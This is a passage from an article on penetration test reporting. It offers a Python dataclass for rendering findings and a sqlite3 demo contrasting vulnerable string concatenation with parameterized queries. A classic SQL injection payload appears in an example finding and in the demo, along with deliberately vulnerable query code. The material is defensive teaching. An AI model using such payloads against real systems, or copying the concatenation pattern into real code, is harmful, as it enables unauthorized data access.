  • Appendices: Any detailed output (like full Nessus scan results, or scripts output) can go here, to keep the main text cleaner. Also, things like raw request/response dumps can be put here if they were too bulky for the main finding entry. Other appendix items could include the scope details (target IPs, etc.), a glossary of terms for non-technical readers, and the action plan matrix for remediation.
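To keep findings consistent across a report, some teams capture each finding as structured data and render the report sections from it. Below is a minimal sketch in Python; the field names, severity scale, and example values follow the finding structure described above but are otherwise illustrative choices:

```python
from dataclasses import dataclass, field

@dataclass
class Finding:
    """One pen test finding; fields mirror the report structure above.
    Field names and the severity scale are illustrative assumptions."""
    title: str
    severity: str            # Critical / High / Medium / Low / Informational
    description: str
    proof_of_concept: str    # request/response excerpt, screenshot ref, etc.
    impact: str
    remediation: str
    affected_assets: list = field(default_factory=list)

    def to_markdown(self) -> str:
        """Render this finding as one Markdown report entry."""
        assets = ", ".join(self.affected_assets) or "N/A"
        return (
            f"### {self.title} ({self.severity})\n\n"
            f"**Description:** {self.description}\n\n"
            f"**Proof of Concept:** {self.proof_of_concept}\n\n"
            f"**Impact:** {self.impact}\n\n"
            f"**Remediation:** {self.remediation}\n\n"
            f"**Affected Assets:** {assets}\n"
        )

# Hypothetical example finding for demonstration.
finding = Finding(
    title="SQL Injection in search parameter",
    severity="Critical",
    description="The 'q' parameter of /search is concatenated into a SQL query.",
    proof_of_concept="GET /search?q=' OR '1'='1 returned all product rows.",
    impact="An attacker could dump the entire user database.",
    remediation="Use parameterized queries; validate input server-side.",
    affected_assets=["https://app.example.com/search"],
)
print(finding.to_markdown())
```

A side benefit of this approach is that the executive summary table and the compliance mapping can be generated from the same data, so the three views of a finding never drift out of sync.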
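The “prepared statements” short-term fix recommended above can also be demonstrated concretely in the report. A minimal, self-contained sketch using Python’s built-in sqlite3 module (the table, column, and payload are hypothetical examples) shows why string concatenation is dangerous and parameterization is safe:

```python
import sqlite3

# Hypothetical schema, purely for demonstration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
conn.execute("INSERT INTO products VALUES (1, 'Widget'), (2, 'Gadget')")

user_input = "' OR '1'='1"  # classic SQL injection payload

# VULNERABLE: concatenation lets the payload rewrite the query logic,
# turning the WHERE clause into a condition that is always true.
vulnerable_sql = f"SELECT name FROM products WHERE name = '{user_input}'"
leaked = conn.execute(vulnerable_sql).fetchall()   # returns ALL rows

# SAFE: a parameterized (prepared) query treats the payload as a
# literal string value, so it matches nothing.
safe = conn.execute(
    "SELECT name FROM products WHERE name = ?", (user_input,)
).fetchall()                                       # returns no rows

print(len(leaked), len(safe))  # → 2 0
```

Including a before/after snippet like this in the remediation section gives developers a concrete target, rather than just the instruction “sanitize input.”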

In writing the report, language is key: it must be accurate but also accessible. Avoid jargon where possible or explain it (for instance, not all managers know what “XSS” means – in summary sections, call it “a code injection flaw (Cross-Site Scripting)”). Use active voice and clear statements. Instead of “It was observed that the application is vulnerable to X,” say “The application’s search field is vulnerable to XSS, which means an attacker can execute malicious script in users’ browsers.”

Also, maintain an objective and constructive tone. Avoid sounding accusatory or overly critical of the development team – focus on facts and improvements. For example, say “The login page does not implement account lockout, allowing unlimited password guesses. We recommend implementing lockout after 5 failed attempts to mitigate brute-force risk,” rather than “The developers failed to implement basic account lockout.”

Finally, the report should highlight not just what’s wrong, but also what to do next. The Risk Remediation Guidance embedded or in a dedicated section is crucial to make the report actionable. Each recommendation should be specific enough to act on. For severe issues, if possible, provide multiple mitigation options (short-term patch vs long-term refactor, etc.).

Invitation to Download Templates & Cheat Sheet: To facilitate effective reporting and remediation, we have prepared a ready-to-use penetration test report template and an attack payload cheat sheet (featuring snippets like those shown in this article). These resources are designed to be adapted to your needs – you can fill in the specifics of your test into the template and use the cheat sheet as a quick reference for common attack payloads and how to detect/prevent them. We encourage readers to download these resources and tailor them for their own engagements. They serve as a starting point to ensure you don’t overlook important sections in your report and to provide consistency in testing processes. (The cheat sheet can be shared with developers as well, as a training aid on what certain attacks look like.)

In conclusion, a penetration test is only as valuable as the improvements it leads to. A clear report is the catalyst for those improvements. By following a structured approach to reporting – delivering an executive summary, detailed technical findings with severity, tailored remediation guidance, and mapping to compliance – you ensure that the hard work of the test translates into actionable intelligence. This empowers the organization not only to fix the issues found, but also to bolster its security program and compliance standing for the future. The report, combined with a solid remediation plan and retest verification, completes the A-to-Z cycle of the penetration test, turning identified vulnerabilities into a stronger security posture moving forward.
